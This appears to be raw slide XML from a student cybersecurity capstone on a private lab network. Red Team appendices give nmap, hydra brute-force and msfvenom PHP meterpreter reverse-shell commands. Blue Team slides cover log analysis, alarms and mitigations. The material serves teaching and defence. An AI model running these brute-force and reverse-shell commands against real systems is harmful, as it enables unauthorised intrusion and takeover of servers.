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7" r:id="rId10"/>
    <p:sldId id="310" r:id="rId11"/>
    <p:sldId id="271" r:id="rId12"/>
    <p:sldId id="273" r:id="rId13"/>
    <p:sldId id="275" r:id="rId14"/>
    <p:sldId id="278" r:id="rId15"/>
    <p:sldId id="280" r:id="rId16"/>
    <p:sldId id="286" r:id="rId17"/>
    <p:sldId id="290" r:id="rId18"/>
    <p:sldId id="291" r:id="rId19"/>
    <p:sldId id="294" r:id="rId20"/>
    <p:sldId id="295" r:id="rId21"/>
    <p:sldId id="296" r:id="rId22"/>
    <p:sldId id="298" r:id="rId23"/>
    <p:sldId id="299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263" r:id="rId33"/>
    <p:sldId id="312" r:id="rId34"/>
    <p:sldId id="268" r:id="rId35"/>
    <p:sldId id="270" r:id="rId36"/>
    <p:sldId id="272" r:id="rId37"/>
    <p:sldId id="274" r:id="rId38"/>
    <p:sldId id="311" r:id="rId3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Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId45"/>
      <p:bold r:id="rId46"/>
      <p:italic r:id="rId47"/>
      <p:boldItalic r:id="rId48"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:bold r:id="rId49"/>
      <p:boldItalic r:id="rId50"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId51"/>
      <p:bold r:id="rId52"/>
      <p:italic r:id="rId53"/>
      <p:boldItalic r:id="rId54"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId55"/>
      <p:bold r:id="rId56"/>
      <p:italic r:id="rId57"/>
      <p:boldItalic r:id="rId58"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin" panose="02000000000000000000" pitchFamily="2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8" roundtripDataSignature="AMtx7miFV1FNBCg+ncn32jqWaWZGdYJJ5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3185B22-D61D-45F9-9CB7-DBD8C1C59AAB}">
  <a:tblStyle styleId="{63185B22-D61D-45F9-9CB7-DBD8C1C59AA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2" y="230"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz"/>
        <p:guide orient="horz" pos="22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21.fntdata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78" Type="http://customschemas.google.com/relationships/presentationmetadata" Target="meta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6" name="Google Shape;101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62" name="Google Shape;116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16926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1" name="Google Shape;119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06" name="Google Shape;120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4" name="Google Shape;123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56" name="Google Shape;125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1" name="Google Shape;127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9" name="Google Shape;131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1" name="Google Shape;1351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9" name="Google Shape;1359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3" name="Google Shape;1383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2" name="Google Shape;10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1" name="Google Shape;1391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9" name="Google Shape;1399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5" name="Google Shape;1415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3" name="Google Shape;1423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7" name="Google Shape;1447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4" name="Google Shape;1454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2" name="Google Shape;1462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0" name="Google Shape;1470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8" name="Google Shape;1478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7" name="Google Shape;1487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" name="Google Shape;104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5" name="Google Shape;1495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" name="Google Shape;104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42917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8" name="Google Shape;108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09" name="Google Shape;110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957163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1" name="Google Shape;114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0" name="Google Shape;117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9" name="Google Shape;119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3" name="Google Shape;121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4" name="Google Shape;123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11297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5" name="Google Shape;105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4" name="Google Shape;106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2" name="Google Shape;10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0" name="Google Shape;108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7" name="Google Shape;111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33" name="Google Shape;113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5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56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5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5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6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86" name="Google Shape;86;p6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pic>
        <p:nvPicPr>
          <p:cNvPr id="88" name="Google Shape;88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6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" name="Google Shape;90;p6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6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6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6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6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66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7" name="Google Shape;97;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="138" r="148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" name="Google Shape;99;p6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67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="58" b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67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6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" name="Google Shape;105;p67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" name="Google Shape;106;p6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7" name="Google Shape;107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67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68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="58" b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6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6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6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68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6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6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Google Shape;119;p6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69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6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3" name="Google Shape;123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" name="Google Shape;124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6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69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27" name="Google Shape;127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" name="Google Shape;128;p6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p6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0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="58" b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7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7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" name="Google Shape;135;p70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p70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7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9" name="Google Shape;139;p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1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7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3" name="Google Shape;143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4" name="Google Shape;144;p71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71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71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7" name="Google Shape;147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8" name="Google Shape;148;p7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9" name="Google Shape;149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72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="58" b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7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72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="209" r="207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" name="Google Shape;157;p7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7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" name="Google Shape;160;p7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3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3" name="Google Shape;163;p7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4" name="Google Shape;164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5" name="Google Shape;165;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="504" r="502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73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8" name="Google Shape;168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9" name="Google Shape;169;p7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" name="Google Shape;170;p7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4" name="Google Shape;174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75" name="Google Shape;175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6" name="Google Shape;176;p7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7" name="Google Shape;177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8" name="Google Shape;178;p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79" name="Google Shape;179;p74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0" name="Google Shape;180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1" name="Google Shape;181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" name="Google Shape;182;p74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3" name="Google Shape;183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4" name="Google Shape;184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p74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6" name="Google Shape;186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7" name="Google Shape;187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" name="Google Shape;188;p74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89" name="Google Shape;189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" name="Google Shape;191;p74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" name="Google Shape;192;p7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7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7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74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" name="Google Shape;196;p74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74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" name="Google Shape;15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5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" name="Google Shape;17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57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" name="Google Shape;201;p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02" name="Google Shape;202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3" name="Google Shape;203;p7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4" name="Google Shape;204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Google Shape;205;p7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06" name="Google Shape;206;p75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7" name="Google Shape;207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8" name="Google Shape;208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" name="Google Shape;209;p75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0" name="Google Shape;210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1" name="Google Shape;211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" name="Google Shape;212;p75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3" name="Google Shape;213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4" name="Google Shape;214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" name="Google Shape;215;p75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6" name="Google Shape;216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7" name="Google Shape;217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" name="Google Shape;218;p75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" name="Google Shape;219;p7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7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7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7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75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75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25" name="Google Shape;225;p75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6" name="Google Shape;226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" name="Google Shape;228;p7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7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6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" name="Google Shape;233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34" name="Google Shape;234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5" name="Google Shape;235;p7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6" name="Google Shape;236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7" name="Google Shape;237;p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38" name="Google Shape;238;p76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39" name="Google Shape;239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0" name="Google Shape;240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1" name="Google Shape;241;p7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76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" name="Google Shape;243;p76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4" name="Google Shape;244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5" name="Google Shape;245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" name="Google Shape;246;p76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7" name="Google Shape;247;p76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8" name="Google Shape;24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9" name="Google Shape;24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" name="Google Shape;250;p76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1" name="Google Shape;251;p76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2" name="Google Shape;252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3" name="Google Shape;253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76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" name="Google Shape;255;p76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6" name="Google Shape;256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" name="Google Shape;258;p76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9" name="Google Shape;259;p76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0" name="Google Shape;260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" name="Google Shape;262;p76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" name="Google Shape;263;p76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4" name="Google Shape;264;p76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5" name="Google Shape;265;p76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6" name="Google Shape;266;p76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7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71" name="Google Shape;271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2" name="Google Shape;272;p7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73" name="Google Shape;273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4" name="Google Shape;274;p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75" name="Google Shape;275;p77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6" name="Google Shape;276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7" name="Google Shape;277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77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9" name="Google Shape;279;p77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" name="Google Shape;280;p77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1" name="Google Shape;281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2" name="Google Shape;282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p77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77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5" name="Google Shape;285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6" name="Google Shape;286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p77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" name="Google Shape;288;p77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89" name="Google Shape;289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0" name="Google Shape;290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1" name="Google Shape;291;p77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" name="Google Shape;292;p77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3" name="Google Shape;293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5" name="Google Shape;295;p77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6" name="Google Shape;296;p77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7" name="Google Shape;297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" name="Google Shape;299;p77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77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77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7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77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78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08" name="Google Shape;308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9" name="Google Shape;309;p7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10" name="Google Shape;310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1" name="Google Shape;311;p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2" name="Google Shape;312;p78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3" name="Google Shape;313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4" name="Google Shape;314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5" name="Google Shape;315;p78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78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7" name="Google Shape;317;p78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8" name="Google Shape;318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9" name="Google Shape;319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" name="Google Shape;320;p78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78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2" name="Google Shape;322;p78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3" name="Google Shape;323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4" name="Google Shape;324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5" name="Google Shape;325;p78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78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7" name="Google Shape;327;p78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8" name="Google Shape;328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9" name="Google Shape;329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0" name="Google Shape;330;p78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78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2" name="Google Shape;332;p78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3" name="Google Shape;333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4" name="Google Shape;334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5" name="Google Shape;335;p78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78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" name="Google Shape;337;p78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8" name="Google Shape;338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9" name="Google Shape;339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0" name="Google Shape;340;p78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1" name="Google Shape;341;p78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2" name="Google Shape;342;p78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3" name="Google Shape;343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4" name="Google Shape;344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5" name="Google Shape;345;p78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49" name="Google Shape;349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" name="Google Shape;350;p7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51" name="Google Shape;351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2" name="Google Shape;352;p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79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4" name="Google Shape;354;p79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5" name="Google Shape;35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7" name="Google Shape;357;p79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8" name="Google Shape;358;p79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9" name="Google Shape;359;p79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0" name="Google Shape;360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1" name="Google Shape;361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79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79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4" name="Google Shape;364;p79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5" name="Google Shape;36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6" name="Google Shape;36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7" name="Google Shape;367;p79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8" name="Google Shape;368;p79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9" name="Google Shape;369;p79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0" name="Google Shape;370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1" name="Google Shape;371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2" name="Google Shape;372;p79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3" name="Google Shape;373;p79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4" name="Google Shape;374;p79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5" name="Google Shape;37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6" name="Google Shape;37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7" name="Google Shape;377;p79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8" name="Google Shape;378;p79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9" name="Google Shape;379;p79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0" name="Google Shape;380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1" name="Google Shape;381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2" name="Google Shape;382;p79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79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4" name="Google Shape;384;p79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5" name="Google Shape;38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6" name="Google Shape;38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7" name="Google Shape;387;p79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8" name="Google Shape;388;p79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9" name="Google Shape;389;p79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0" name="Google Shape;390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1" name="Google Shape;391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2" name="Google Shape;392;p79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5" name="Google Shape;395;p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96" name="Google Shape;396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7" name="Google Shape;397;p8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98" name="Google Shape;398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8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0" name="Google Shape;400;p80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1" name="Google Shape;401;p80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2" name="Google Shape;402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" name="Google Shape;404;p80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80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6" name="Google Shape;406;p80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7" name="Google Shape;407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8" name="Google Shape;408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9" name="Google Shape;409;p80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80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1" name="Google Shape;411;p80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2" name="Google Shape;412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3" name="Google Shape;413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4" name="Google Shape;414;p80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5" name="Google Shape;415;p80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6" name="Google Shape;416;p80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7" name="Google Shape;417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8" name="Google Shape;418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9" name="Google Shape;419;p80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80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1" name="Google Shape;421;p80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2" name="Google Shape;422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3" name="Google Shape;423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4" name="Google Shape;424;p80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5" name="Google Shape;425;p80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6" name="Google Shape;426;p80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7" name="Google Shape;427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8" name="Google Shape;428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9" name="Google Shape;429;p80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80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1" name="Google Shape;431;p80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2" name="Google Shape;432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3" name="Google Shape;433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" name="Google Shape;434;p80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80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6" name="Google Shape;436;p80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7" name="Google Shape;437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8" name="Google Shape;438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9" name="Google Shape;439;p80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43" name="Google Shape;443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4" name="Google Shape;444;p8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45" name="Google Shape;445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6" name="Google Shape;446;p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447" name="Google Shape;447;p81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8" name="Google Shape;448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9" name="Google Shape;449;p8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" name="Google Shape;450;p81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81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452" name="Google Shape;452;p81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53" name="Google Shape;453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4" name="Google Shape;454;p8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5" name="Google Shape;455;p81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81"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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457" name="Google Shape;457;p81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8" name="Google Shape;458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9" name="Google Shape;459;p8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0" name="Google Shape;460;p81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81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65" name="Google Shape;465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6" name="Google Shape;466;p8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67" name="Google Shape;467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8" name="Google Shape;468;p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82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82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82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82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82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82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5" name="Google Shape;475;p82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82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82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82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82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82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1" name="Google Shape;481;p82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2" name="Google Shape;482;p82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82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82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82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82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82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82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8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93" name="Google Shape;493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4" name="Google Shape;494;p8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95" name="Google Shape;495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6" name="Google Shape;496;p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7" name="Google Shape;497;p8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8" name="Google Shape;498;p8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8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8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8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8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8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04" name="Google Shape;504;p8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83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="236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83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="236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8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1" name="Google Shape;511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12" name="Google Shape;512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3" name="Google Shape;513;p8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14" name="Google Shape;514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5" name="Google Shape;515;p8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84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8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8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8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84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1" name="Google Shape;521;p84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84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23" name="Google Shape;523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58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" name="Google Shape;25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31" name="Google Shape;531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2" name="Google Shape;532;p8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33" name="Google Shape;533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4" name="Google Shape;534;p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85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6" name="Google Shape;536;p8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8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8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85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0" name="Google Shape;540;p85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85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42" name="Google Shape;542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50" name="Google Shape;550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1" name="Google Shape;551;p8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52" name="Google Shape;552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3" name="Google Shape;553;p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86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8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8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8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86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86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86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61" name="Google Shape;561;p86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86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86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86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69" name="Google Shape;569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0" name="Google Shape;570;p8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71" name="Google Shape;571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2" name="Google Shape;572;p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8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8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8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8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8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8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8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8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8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82" name="Google Shape;582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87"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="236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87"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="236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91" name="Google Shape;591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2" name="Google Shape;592;p8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93" name="Google Shape;593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4" name="Google Shape;594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88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8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8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8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88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88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88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8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88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04" name="Google Shape;604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2" name="Google Shape;612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13" name="Google Shape;613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4" name="Google Shape;614;p8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15" name="Google Shape;615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6" name="Google Shape;616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89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8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8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8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8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2" name="Google Shape;622;p89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3" name="Google Shape;623;p89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8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8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26" name="Google Shape;626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35" name="Google Shape;635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6" name="Google Shape;636;p9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37" name="Google Shape;637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8" name="Google Shape;638;p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9" name="Google Shape;639;p90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9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9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9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9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4" name="Google Shape;644;p90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90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9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9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48" name="Google Shape;648;p90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90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90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90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90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9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57" name="Google Shape;657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8" name="Google Shape;658;p9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59" name="Google Shape;659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0" name="Google Shape;660;p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1" name="Google Shape;661;p9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2" name="Google Shape;662;p9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9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9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9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9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9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8" name="Google Shape;668;p9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9" name="Google Shape;669;p9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0" name="Google Shape;670;p9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1" name="Google Shape;671;p9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72" name="Google Shape;672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91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="236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91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="236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91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="236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9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1" name="Google Shape;681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82" name="Google Shape;682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3" name="Google Shape;683;p9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84" name="Google Shape;684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5" name="Google Shape;685;p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9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9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9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9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9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9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92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3" name="Google Shape;693;p92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4" name="Google Shape;694;p92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5" name="Google Shape;695;p92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92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97" name="Google Shape;697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9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07" name="Google Shape;707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8" name="Google Shape;708;p9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09" name="Google Shape;709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10" name="Google Shape;710;p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1" name="Google Shape;711;p9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9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9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9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9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9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93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93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93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9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1" name="Google Shape;721;p93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22" name="Google Shape;722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9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32" name="Google Shape;732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3" name="Google Shape;733;p9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34" name="Google Shape;734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5" name="Google Shape;735;p9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94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9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9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9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9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9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94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3" name="Google Shape;743;p94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94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94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94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47" name="Google Shape;747;p9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9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9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9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9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9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9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="118" b="118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5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" name="Google Shape;30;p5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5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3" name="Google Shape;33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Google Shape;35;p5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57" name="Google Shape;757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8" name="Google Shape;758;p9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59" name="Google Shape;759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0" name="Google Shape;760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9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2" name="Google Shape;762;p9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9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9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9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9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9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9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9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0" name="Google Shape;770;p9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9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9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9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74" name="Google Shape;774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95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95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95"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1380" b="1388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9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4" name="Google Shape;784;p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85" name="Google Shape;785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6" name="Google Shape;786;p9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87" name="Google Shape;787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8" name="Google Shape;788;p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9" name="Google Shape;789;p9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9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96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9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9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9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96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6" name="Google Shape;796;p9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96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8" name="Google Shape;798;p9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9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0" name="Google Shape;800;p9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9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02" name="Google Shape;802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9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13" name="Google Shape;813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4" name="Google Shape;814;p9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15" name="Google Shape;815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6" name="Google Shape;816;p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97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9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97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9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97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9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97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4" name="Google Shape;824;p9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97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6" name="Google Shape;826;p9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97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8" name="Google Shape;828;p9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97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30" name="Google Shape;830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97"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2882" b="2891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97"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2882" b="2891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98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0" name="Google Shape;840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41" name="Google Shape;841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2" name="Google Shape;842;p9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3" name="Google Shape;843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4" name="Google Shape;844;p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5" name="Google Shape;845;p98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6" name="Google Shape;846;p98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98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8" name="Google Shape;848;p98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98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98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98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98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98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98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98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98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98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58" name="Google Shape;858;p98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98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98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98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98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98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1616" b="1615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98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1616" b="1615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68" name="Google Shape;868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9" name="Google Shape;869;p9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0" name="Google Shape;870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1" name="Google Shape;871;p9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9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9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4" name="Google Shape;874;p9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9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6" name="Google Shape;876;p9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9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9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9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9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9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9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9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4" name="Google Shape;884;p9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9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6" name="Google Shape;886;p9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9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88" name="Google Shape;888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99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99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99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99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10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99" name="Google Shape;899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0" name="Google Shape;900;p10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1" name="Google Shape;901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2" name="Google Shape;902;p10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3" name="Google Shape;903;p10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100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10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100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10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100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10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100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10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100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3" name="Google Shape;913;p10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100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5" name="Google Shape;915;p10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100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7" name="Google Shape;917;p10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100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19" name="Google Shape;919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9" name="Google Shape;929;p10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30" name="Google Shape;930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1" name="Google Shape;931;p10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2" name="Google Shape;932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3" name="Google Shape;933;p10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4" name="Google Shape;934;p10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101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6" name="Google Shape;936;p10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101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10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101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10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101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10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101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10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101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6" name="Google Shape;946;p10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101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8" name="Google Shape;948;p10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101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50" name="Google Shape;950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1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61" name="Google Shape;961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2" name="Google Shape;962;p10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3" name="Google Shape;963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4" name="Google Shape;964;p10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102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102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102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102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102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102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102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102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3" name="Google Shape;973;p102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102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5" name="Google Shape;975;p102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102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7" name="Google Shape;977;p102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102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9" name="Google Shape;979;p102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102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81" name="Google Shape;981;p102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102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102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102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102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102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02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102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103"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="58" b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103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10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3" name="Google Shape;993;p10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94" name="Google Shape;994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103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 b="0" i="0" u="none" strike="noStrike" cap="non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6" name="Google Shape;996;p103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10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10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0" name="Google Shape;1000;p10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1" name="Google Shape;1001;p104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36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2" name="Google Shape;1002;p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9" name="Google Shape;39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" name="Google Shape;41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60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60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" name="Google Shape;45;p60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0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" name="Google Shape;47;p60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60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0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05" name="Google Shape;1005;p1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0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08" name="Google Shape;1008;p1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106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0" name="Google Shape;1010;p106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0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13" name="Google Shape;1013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6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61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6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56" name="Google Shape;56;p6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6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6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9" name="Google Shape;59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60" name="Google Shape;60;p6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6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6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3" name="Google Shape;63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6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66" name="Google Shape;66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" name="Google Shape;68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69" name="Google Shape;69;p6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6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6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2" name="Google Shape;72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6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76" name="Google Shape;76;p6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6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8" name="Google Shape;78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79" name="Google Shape;79;p6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6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6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2" name="Google Shape;82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6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"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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-US" sz="3100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US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Exploitation: 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Brute Force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ttacks </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2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Brute force the password for user ‘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ashton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’ to access the hidden directory (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) using the hydra command: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hydra –l </a:t>
            </a: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ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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 –P /</a:t>
            </a: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usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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/share/wordlists/rockyou.txt –s 80 –f –v 192.168.1.105 http-get /</a:t>
            </a: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company_folders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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/</a:t>
            </a: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secret_folder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Break the hash password for user ‘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ryan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’ using the site ‘crackstation.net’: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7" name="Google Shape;116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743" y="3590955"/>
            <a:ext cx="8251740" cy="66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3312A5-9C59-4C39-9A6D-CB4FC6770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615" y="2035628"/>
            <a:ext cx="7395851" cy="6515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6C2713-B632-4F45-8E86-59B08041A392}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475615" y="4917927"/>
            <a:ext cx="7164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Please refer to Appendix B:  Brute Force Attacks for tools and techniques used.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="496579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Exploitation: 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File/Shell Script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U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ploads</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2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Connect to the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WebDav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server using the username ‘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ryan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’ and hash password recently cracked:</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1195" name="Google Shape;119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9586" y="1436370"/>
            <a:ext cx="2720340" cy="2270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482" y="1049365"/>
            <a:ext cx="5706350" cy="37859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0957B2-25E8-4B8A-912A-D3E6176AABAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454970" y="4897279"/>
            <a:ext cx="7164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Please refer to Appendix C1:  File/Shell Script Uploads for tools and techniques used.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Exploitation: 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File/Shell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cript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U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ploads (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con’t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)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2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Create and upload a reverse shell payload script (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con’t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):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								</a:t>
            </a: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endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209" name="Google Shape;1209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pic>
        <p:nvPicPr>
          <p:cNvPr id="1210" name="Google Shape;121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249" y="1081100"/>
            <a:ext cx="3667440" cy="34690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258304-89B1-4C19-B0E8-DB6E4F0D8EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454970" y="4897279"/>
            <a:ext cx="7164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Please refer to Appendix C2:  File/Shell Script Uploads for how we created this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r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 file.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21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="6626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Exploitation: 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Reverse Shell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ession </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2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From the security tool Metasploit’s command line interface, we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listener where we wait to be connected to the victim’s machine.</a:t>
            </a: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Victim click’s on the ‘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shell.php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’ file to open up a shell session on the attacker’s machine.</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="1238" name="Google Shape;123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970" y="1311084"/>
            <a:ext cx="5042730" cy="44030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B77ABC-2C6A-464C-B5F9-B56F924D1039}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454970" y="4897279"/>
            <a:ext cx="7164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Please refer to Appendix D1 &amp; D2:  Reverse Shell Session for tools and techniques used.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84A8A4-CBEB-4FD9-BD70-4F0A87C21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70" y="2522145"/>
            <a:ext cx="3641927" cy="22874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Exploitation: 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Reverse Shell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ession (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con’t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)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2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From the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meterpreter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session, we are able to maneuver within the system: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Ability to download a file.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Successfully downloaded this ‘flag.txt’ file into our Kali (attacker) machine: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sp>
        <p:nvSpPr>
          <p:cNvPr id="1259" name="Google Shape;1259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pic>
        <p:nvPicPr>
          <p:cNvPr id="1260" name="Google Shape;126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105" y="1508714"/>
            <a:ext cx="5386273" cy="1508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268;gdca5c3f7c4_0_12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EE76A37-7398-4990-8E09-0F986A45140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0105" y="3667518"/>
            <a:ext cx="6424880" cy="894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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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b="1"/>
              <a:t>Blue Team</a:t>
            </a:r>
            <a:endParaRPr b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-US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75" name="Google Shape;1275;p2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Analysis: Identifying Capstone Traffic</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill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From the ‘Top Hosts Creating Traffic’ report, we can see a lot of high traffic coming from the Capstone’s (victim) machine @ 192.168.1.105.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="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    -  There was a sudden spike over time on May 6, 2021.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="18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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1322" name="Google Shape;1322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323" name="Google Shape;1323;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439922" y="1355271"/>
            <a:ext cx="8409300" cy="291846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9182FC-7018-4E88-B682-C78DD8E61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608" y="1396199"/>
            <a:ext cx="5207928" cy="28366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Analysis: Identifying Request for Hidden Directory</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
